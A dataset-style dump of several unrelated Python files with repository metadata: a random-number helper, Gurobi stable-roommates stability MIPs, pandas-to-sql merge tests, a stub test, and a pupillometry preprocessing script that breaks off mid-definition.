] | null | null | null |
app/utils/statistics.py
|
TUIASI-AC-enaki/flappy-bird-with-ai
|
e1b70108b0e6a548033dc1845fabcd5459fb2cbe
|
[
"MIT"
] | null | null | null |
app/utils/statistics.py
|
TUIASI-AC-enaki/flappy-bird-with-ai
|
e1b70108b0e6a548033dc1845fabcd5459fb2cbe
|
[
"MIT"
] | 1
|
2021-08-29T09:32:12.000Z
|
2021-08-29T09:32:12.000Z
|
import random
def generate_random_int_range(max_range=1, min_range=0):
    """Return a random integer drawn uniformly from [min_range, max_range] inclusive."""
    drawn = random.randint(min_range, max_range)
    return drawn
def generate_random_range(min_range=-1, max_range=1):
    """Return a random float drawn uniformly from [min_range, max_range)."""
    span = max_range - min_range
    return random.random() * span + min_range
| 26.777778
| 64
| 0.771784
| 39
| 241
| 4.410256
| 0.307692
| 0.232558
| 0.226744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018957
| 0.124481
| 241
| 9
| 64
| 26.777778
| 0.796209
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a75fd2445a76915f2077916483b909fc6ba27f45
| 4,873
|
py
|
Python
|
mapel/roommates/features/distance_to_stability_features.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
mapel/roommates/features/distance_to_stability_features.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
mapel/roommates/features/distance_to_stability_features.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
import gurobipy as gp
from gurobipy import GRB
from random import shuffle
import statistics
import warnings
import sys
import time
import networkx as nx
def generate_instance(num_agents):
    """Build a random roommates instance: for each agent, a shuffled preference
    list ranking every other agent exactly once."""
    agents = range(num_agents)
    instance = []
    for me in agents:
        others = [a for a in agents if a != me]
        shuffle(others)
        instance.append(others)
    return instance
#Only works for even number of agents
def swap_distance_to_stable(instance):
    """Solve a Gurobi MIP whose optimum is the minimum total amount by which
    agents' matched partners must be moved up in their preference lists so
    that a stable perfect matching exists; returns that optimum as an int.

    NOTE(review): per the comment above this function, it only works for an
    even number of agents (a perfect matching is enforced below) — confirm.
    """
    num_agents=len(instance)
    m = gp.Model("mip1")
    # silence solver output
    m.setParam('OutputFlag', False)
    #who is matched to whom
    x = m.addVars(num_agents, num_agents, lb=0, ub=1, vtype=GRB.BINARY)
    #am I matched to rank i or better
    gm = m.addVars(num_agents, num_agents-1, lb=0, ub=1, vtype=GRB.BINARY)
    #by how much have my partner been swaped up in my preferences
    yy = m.addVars(num_agents, lb=0, ub=num_agents, vtype=GRB.INTEGER)
    # warm start: no swaps
    for i in range(num_agents):
        yy[i].start=0
    # objective variable: sum of all per-agent swap amounts
    opt = m.addVar(vtype=GRB.INTEGER, lb=0, ub=num_agents*num_agents)
    m.addConstr(gp.quicksum(yy[i] for i in range(num_agents)) == opt)
    # nobody is matched to themselves
    for i in range(num_agents):
        m.addConstr(x[i, i] == 0)
    # matching is symmetric
    for i in range(num_agents):
        for j in range(num_agents):
            m.addConstr(x[i, j] == x[j, i])
    # link x, yy, gm: if i is matched to j and gm[i,t] is set, j's original
    # rank in i's list must be within t plus i's swap allowance yy[i]
    # (num_agents*(1-gm[i,t]) deactivates the constraint when gm[i,t]=0)
    for i in range(num_agents):
        for j in range(num_agents):
            if i!=j:
                for t in range(num_agents-1):
                    m.addConstr(x[i, j]*instance[i].index(j) <= t+yy[i]+num_agents*(1-gm[i,t]))
    # perfect matching: every agent has exactly one partner
    for i in range(num_agents):
        m.addConstr(gp.quicksum(x[i, j] for j in range(num_agents)) == 1)
    # stability: for each pair (i, j), at least one of the two is matched at
    # the rank of the other or better, so (i, j) cannot be a blocking pair
    for i in range(num_agents):
        for j in range(i+1,num_agents):
            m.addConstr(gm[i,instance[i].index(j)]+gm[j,instance[j].index(i)]>=1)
    m.setObjective(opt, GRB.MINIMIZE)
    m.optimize()
    return int(m.objVal)
def delete_distance_to_stable(instance):
    """Solve a Gurobi MIP whose optimum is the minimum number of agents to
    delete (y[i] = 1) so the remaining instance admits a stable matching;
    returns that optimum as an int.
    """
    num_agents=len(instance)
    m = gp.Model("mip1")
    # silence solver output
    m.setParam('OutputFlag', False)
    # x[i, j] = 1 iff i and j are matched to each other
    x = m.addVars(num_agents, num_agents, lb=0, ub=1, vtype=GRB.BINARY)
    # y[i] = 1 iff agent i is deleted from the instance
    y = m.addVars(num_agents, lb=0, ub=1, vtype=GRB.BINARY)
    # warm start: delete nobody
    for i in range(num_agents):
        y[i].start=0
    # objective variable: number of deleted agents
    opt = m.addVar(vtype=GRB.INTEGER, lb=0, ub=num_agents)
    m.addConstr(gp.quicksum(y[i] for i in range(num_agents)) == opt)
    # nobody is matched to themselves
    for i in range(num_agents):
        m.addConstr(x[i, i] == 0)
    # matching is symmetric
    for i in range(num_agents):
        for j in range(num_agents):
            m.addConstr(x[i, j] == x[j, i])
    # each non-deleted agent has at most one partner; deleted agents have none
    for i in range(num_agents):
        m.addConstr(gp.quicksum(x[i, j] for j in range(num_agents)) <= (1-y[i]))
    # stability for each surviving pair (i, j): some pair at least as good as
    # (i, j) for one of the two must be in the matching, else (i, j) blocks
    for i in range(num_agents):
        for j in range(i+1,num_agents):
            # pairs i (resp. j) weakly prefers to being matched with j (resp. i)
            better_pairs=[]
            for t in range(0,instance[i].index(j)+1):
                better_pairs.append([i,instance[i][t]])
            for t in range(0,instance[j].index(i)+1):
                better_pairs.append([j,instance[j][t]])
            m.addConstr(gp.quicksum(x[a[0], a[1]] for a in better_pairs) >= 1-y[i]-y[j])
    m.setObjective(opt, GRB.MINIMIZE)
    m.optimize()
    # NOTE(review): the matching dict below is built from the solution but
    # never used or returned — looks like leftover debugging code.
    matching={}
    for i in range(num_agents):
        for j in range(num_agents):
            if x[i, j].X == 1:
                matching[i]=j
                matching[j]=i
    return int(m.objVal)
def min_num_blocking_agents_matching(instance):
    """Solve a Gurobi MIP minimizing the number of agents flagged as blocking
    (y[i] = 1) over all (possibly partial) matchings; returns the optimum as
    an int.

    NOTE(review): unlike delete_distance_to_stable, the objective here is
    linked with '<=' and flagged agents may still be matched — the y's act as
    blocking-pair excuses rather than deletions.
    """
    num_agents=len(instance)
    m = gp.Model("mip1")
    # silence solver output
    m.setParam('OutputFlag', False)
    # x[i, j] = 1 iff i and j are matched to each other
    x = m.addVars(num_agents, num_agents, lb=0, ub=1, vtype=GRB.BINARY)
    # y[i] = 1 iff agent i is allowed to be part of a blocking pair
    y = m.addVars(num_agents, lb=0, ub=1, vtype=GRB.BINARY)
    # warm start: no blocking agents
    for i in range(num_agents):
        y[i].start=0
    # objective variable: upper bound on the number of flagged agents
    opt = m.addVar(vtype=GRB.INTEGER, lb=0, ub=num_agents)
    m.addConstr(gp.quicksum(y[i] for i in range(num_agents)) <= opt)
    # nobody is matched to themselves
    for i in range(num_agents):
        m.addConstr(x[i, i] == 0)
    # matching is symmetric
    for i in range(num_agents):
        for j in range(num_agents):
            m.addConstr(x[i, j] == x[j, i])
    # each agent has at most one partner (matching may be partial)
    for i in range(num_agents):
        m.addConstr(gp.quicksum(x[i, j] for j in range(num_agents)) <= 1)
    # for each pair (i, j): either a weakly-better pair for one of them is in
    # the matching, or one of i, j is flagged as blocking
    for i in range(num_agents):
        for j in range(i+1,num_agents):
            # pairs i (resp. j) weakly prefers to being matched with j (resp. i)
            better_pairs=[]
            for t in range(0,instance[i].index(j)+1):
                better_pairs.append([i,instance[i][t]])
            for t in range(0,instance[j].index(i)+1):
                better_pairs.append([j,instance[j][t]])
            m.addConstr(gp.quicksum(x[a[0], a[1]] for a in better_pairs) >= 1-y[i]-y[j])
    m.setObjective(opt, GRB.MINIMIZE)
    m.optimize()
    # NOTE(review): the matching dict below is built from the solution but
    # never used or returned — leftover debugging code, like the print below.
    matching={}
    for i in range(num_agents):
        for j in range(num_agents):
            if x[i, j].X == 1:
                matching[i]=j
                matching[j]=i
    # NOTE(review): stray debug print of the objective value
    print(m.objVal)
    return int(m.objVal)
#for i in range(100):
# instance=generate_instance(50)
# print(min_num_blocking_agents_matching(instance))
# print(swap_distance_to_stable(instance))
# print(delete_distance_to_stable(instance))
| 34.807143
| 96
| 0.605992
| 818
| 4,873
| 3.503667
| 0.116137
| 0.178995
| 0.115143
| 0.184229
| 0.818911
| 0.762736
| 0.707258
| 0.673064
| 0.672715
| 0.672715
| 0
| 0.015326
| 0.250154
| 4,873
| 139
| 97
| 35.057554
| 0.76902
| 0.071209
| 0
| 0.716814
| 1
| 0
| 0.009298
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035398
| false
| 0
| 0.070796
| 0
| 0.141593
| 0.00885
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7b8c7bf3d5b15819d951d1005de600a8d14a489
| 1,423
|
py
|
Python
|
pandas_to_sql/testing/tests/test_merge.py
|
AmirPupko/pandas-to-sql
|
12cb699d70acd368a284304d78c086fa0b1bc204
|
[
"MIT"
] | 18
|
2021-01-21T17:10:29.000Z
|
2022-03-30T19:48:00.000Z
|
pandas_to_sql/testing/tests/test_merge.py
|
AmirPupko/pandas-to-sql
|
12cb699d70acd368a284304d78c086fa0b1bc204
|
[
"MIT"
] | null | null | null |
pandas_to_sql/testing/tests/test_merge.py
|
AmirPupko/pandas-to-sql
|
12cb699d70acd368a284304d78c086fa0b1bc204
|
[
"MIT"
] | null | null | null |
import pytest
from pandas_to_sql.testing.utils.asserters import assert_
from pandas_to_sql.conventions import flatten_grouped_dataframe
from copy import copy
def test_merge_inner():
    """Inner merge on a shared key column agrees with pandas semantics."""
    left = pytest.df1
    right = copy(left)
    right['random_int_plus_3'] = right.random_int + 3
    right = right[right.random_int < 3][['random_int_plus_3','random_str']]
    merged = left.merge(right, on='random_str', how='inner')
    assert_(merged)
def test_merge_left():
    """Left merge on a shared key column agrees with pandas semantics."""
    left = pytest.df1
    right = copy(left)
    right['random_int_plus_3'] = right.random_int + 3
    right = right[right.random_int < 3][['random_int_plus_3','random_str']]
    merged = left.merge(right, on='random_str', how='left')
    assert_(merged)
def test_merge_left_on_right_on_how_inner():
    """Inner merge with distinct left_on/right_on key columns."""
    left = pytest.df1
    right = copy(left)
    right['random_int_plus_3'] = right.random_int + 3
    right['random_str_2'] = right.random_str
    right = right[right.random_int < 3][['random_int_plus_3','random_str_2']]
    merged = left.merge(right, left_on='random_str', right_on='random_str_2', how='inner')
    assert_(merged)
def test_merge_left_on_right_on_how_left():
    """Left merge with distinct left_on/right_on key columns."""
    left = pytest.df1
    right = copy(left)
    right['random_int_plus_3'] = right.random_int + 3
    right['random_str_2'] = right.random_str
    right = right[right.random_int < 3][['random_int_plus_3','random_str_2']]
    merged = left.merge(right, left_on='random_str', right_on='random_str_2', how='left')
    assert_(merged)
| 29.645833
| 83
| 0.677442
| 238
| 1,423
| 3.693277
| 0.138655
| 0.204778
| 0.21843
| 0.14562
| 0.8157
| 0.8157
| 0.8157
| 0.8157
| 0.780432
| 0.780432
| 0
| 0.063574
| 0.18201
| 1,423
| 47
| 84
| 30.276596
| 0.691581
| 0
| 0
| 0.684211
| 0
| 0
| 0.201125
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 1
| 0.105263
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a7dcc424174ac504b2a757e1026cd120f81cb347
| 84
|
py
|
Python
|
tests/test_norfair.py
|
pdd-999/norfair
|
83ff3fdae973707d8fc569d270e15badbe4a4619
|
[
"BSD-3-Clause"
] | 1,354
|
2020-09-11T12:04:08.000Z
|
2022-03-30T09:50:25.000Z
|
tests/test_norfair.py
|
Uzarel/norfair
|
1e35cb311b32827030a147e6e9ce4528343e51ca
|
[
"BSD-3-Clause"
] | 67
|
2020-09-14T16:06:13.000Z
|
2022-03-29T19:30:50.000Z
|
tests/test_norfair.py
|
Uzarel/norfair
|
1e35cb311b32827030a147e6e9ce4528343e51ca
|
[
"BSD-3-Clause"
] | 125
|
2020-09-11T19:32:02.000Z
|
2022-03-30T09:50:13.000Z
|
import norfair
def test_norfair():
    """Placeholder smoke test until real coverage exists.

    # TODO: write actual tests
    """
    placeholder_ok = True
    assert placeholder_ok
| 12
| 30
| 0.690476
| 11
| 84
| 5.181818
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 84
| 6
| 31
| 14
| 0.904762
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a7dd8372061181241e3efb6815cb478136676987
| 57,402
|
py
|
Python
|
analysis/irf_task/first_level_irf.py
|
colizoli/belief_state_model
|
90757932fe001c2ddaa6e3a5e437b4ef48d98a88
|
[
"MIT"
] | 3
|
2018-03-04T18:18:25.000Z
|
2018-03-08T11:51:22.000Z
|
analysis/irf_task/first_level_irf.py
|
colizoli/pupil_belief_states
|
90757932fe001c2ddaa6e3a5e437b4ef48d98a88
|
[
"MIT"
] | null | null | null |
analysis/irf_task/first_level_irf.py
|
colizoli/pupil_belief_states
|
90757932fe001c2ddaa6e3a5e437b4ef48d98a88
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
"""
first_level_irf.py
If used, please cite:
Colizoli, O., de Gee, J. W., Urai, A. E. & Donner, T. H.
Task-evoked pupil responses reflect internal belief states. Scientific Reports 8, 13702 (2018).
"""
import os, sys, datetime
import subprocess, logging
import scipy as sp
import scipy.stats as stats
import numpy as np
import matplotlib.pylab as pl
from IPython import embed as shell
this_raw_folder = '/home/raw/'
this_project_folder = '/home/measure_irf'
analysisFolder = os.path.join(this_project_folder, 'analysis')
sys.path.append( analysisFolder )
sys.path.append( os.environ['ANALYSIS_HOME'] )
from Tools.Sessions import *
from Tools.Run import *
import pupil_preprocessing_irf
subjects = ['sub-01', 'sub-02', 'sub-03', 'sub-04', 'sub-05', 'sub-06', 'sub-07', 'sub-08', 'sub-09', 'sub-10', 'sub-11', 'sub-12', 'sub-13', 'sub-14', 'sub-15']
for which_subject in subjects:
sessions = [1,2,3,4]
if which_subject == 'sub-14' or which_subject == 'sub-15':
sessions = [2,3,4]
if which_subject == 'sub-02':
sessions = [1,2,3]
edfs = []
for s in sessions:
def runWholeSession( rDA, session ):
for r in rDA:
thisRun = Run( **r )
presentSession.addRun(thisRun)
session.parcelateConditions()
session.parallelize = True
# initialize pupil session:
global edfs
edfs.append( [rDA[i]['eyeLinkFilePath'] for i in range(len(rDA)) if rDA[i]['condition'] == 'task'] )
if (which_subject=='sub-02' and s == 3) or (which_subject != 'sub-02' and s==4): # if last session
edfs = list(np.concatenate(edfs))
aliases = []
for i in range(len(edfs)):
session = int(edfs[i].split('_s')[1][0])
aliases.append('measureIRF_{}_{}'.format(i+1, session))
print aliases
subject = Subject(which_subject, '?', None, None, None)
experiment = 1
version = 2
# preprocessing:
pupilPreprocessSession = pupil_preprocessing_irf.pupilPreprocessSession(subject=subject, experiment_name='pupil_measureIRF', experiment_nr=experiment, version=version, sample_rate_new=50, project_directory=this_project_folder)
pupilPreprocessSession.import_raw_data(edf_files=edfs, aliases=aliases)
pupilPreprocessSession.convert_edfs(aliases)
# pupilPreprocessSession.delete_hdf5() # run if need to replace HDF5 files
## Run MATLAB code here (MeasureIRF_MSG_FindReplace.m)
pupilPreprocessSession.import_all_data(aliases)
for alias in aliases:
pupilPreprocessSession.process_runs(alias, artifact_rejection='not_strict', create_pupil_BOLD_regressor=False)
# pass
pupilPreprocessSession.process_across_runs(aliases, create_pupil_BOLD_regressor=False)
## missing first trials, and last pupil_cd for each participant!?
# for testing;
if __name__ == '__main__':
########################################################################################################################################################################################################
if which_subject == 'sub-01':
# subject information
initials = 'sub-01'
firstName = 'sub-01'
standardFSID = 'sub-01_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 9)
sj_session1 = 'sub-01_091115'
if s == 2:
sessionDate = datetime.date(2015, 11, 16)
sj_session2 = 'sub-01_161115'
if s == 3:
sessionDate = datetime.date(2015, 11, 27)
sj_session3 = 'sub-01_271115'
if s == 4:
sessionDate = datetime.date(2015, 12, 04)
sj_session4 = 'sub-01_041215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-01_s1_r1_b1_2015-11-09_13-01-09.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-01_s2_r1_b1_2015-11-16_15-18-57.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-01_s3_r1_b1_2015-11-27_13-41-58.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-01_s4_r1_b1_2015-12-04_13-21-02.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-02':
# subject information
initials = 'sub-02'
firstName = 'sub-02'
standardFSID = 'sub-02_110412'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 9, 28)
sj_session1 = 'sub-02_280915'
if s == 2:
sessionDate = datetime.date(2015, 10, 28)
sj_session2 = 'sub-02_281015'
if s == 3:
sessionDate = datetime.date(2015, 11, 3)
sj_session3 = 'sub-02_031115'
if s == 4:
sessionDate = datetime.date(2015, 11, 10)
sj_session4 = 'sub-02_101115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-02_b1_s1_r1_2015-09-28_16-17-09.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-02_s2_r1_b1_2015-10-28_16-22-03.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-02_s3_r2_b1_2015-11-03_17-42-20.edf' ),
},
]
# if s == 4: # gets error on import_all_data
# runDecisionArray = [
# {'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
# 'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-02_s4_r1_b1_2015-11-10_16-18-50.edf' ),
# },
# ]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-03':
# subject information
initials = 'sub-03'
firstName = 'sub-03'
standardFSID = 'sub-03_190414'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 9, 25)
sj_session1 = 'sub-03_250915'
if s == 2:
sessionDate = datetime.date(2015, 11, 3)
sj_session2 = 'sub-03_031115'
if s == 3:
sessionDate = datetime.date(2015, 11, 10)
sj_session3 = 'sub-03_101115'
if s == 4:
sessionDate = datetime.date(2015, 11, 17)
sj_session4 = 'sub-03_171115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-03_b1_s1_r1_2015-09-25_14-14-04.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-03_s2_r1_b1_2015-11-03_18-19-24.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-03_s3_r1_b1_2015-11-10_18-12-32.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-03_s4_r1_b1_2015-11-17_16-08-55.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-04':
# subject information
initials = 'sub-04'
firstName = 'sub-04'
standardFSID = 'sub-04_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 9, 25)
sj_session1 = 'sub-04_250915'
if s == 2:
sessionDate = datetime.date(2015, 11, 12)
sj_session2 = 'sub-04_121115'
if s == 3:
sessionDate = datetime.date(2015, 11, 20)
sj_session3 = 'sub-04_201115'
if s == 4:
sessionDate = datetime.date(2015, 12, 01)
sj_session4 = 'sub-04_011215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-04_b1_s1_r1_2015-09-25_12-34-35.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-04_s2_r1_b1_2015-11-12_10-05-17.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-04_s3_r1_b1_2015-11-20_11-52-27.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-04_s4_r1_b1_2015-12-01_11-56-41.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-05':
# subject information
initials = 'sub-05'
firstName = 'sub-05'
standardFSID = 'sub-05_310312'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 9)
sj_session1 = 'sub-05_091115'
if s == 2:
sessionDate = datetime.date(2015, 11, 16)
sj_session2 = 'sub-05_161115'
if s == 3:
sessionDate = datetime.date(2015, 11, 23)
sj_session3 = 'sub-05_231115'
if s == 4:
sessionDate = datetime.date(2015, 12, 03)
sj_session4 = 'sub-05_031215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-05_s1_r1_b1_2015-11-09_15-26-50.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-05_s2_r1_b1_2015-11-16_11-49-23.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-05_s3_r1_b1_2015-11-23_11-57-28.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-05_s4_r1_b1_2015-12-03_11-28-40.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-06':
# subject information
initials = 'sub-06'
firstName = 'sub-06'
standardFSID = 'sub-06_250514'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 13)
sj_session1 = 'sub-06_131115'
if s == 2:
sessionDate = datetime.date(2015, 11, 21)
sj_session2 = 'sub-06_211115'
if s == 3:
sessionDate = datetime.date(2015, 11, 26)
sj_session3 = 'sub-06_261115'
if s == 4:
sessionDate = datetime.date(2015, 12, 01)
sj_session4 = 'sub-06_011215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
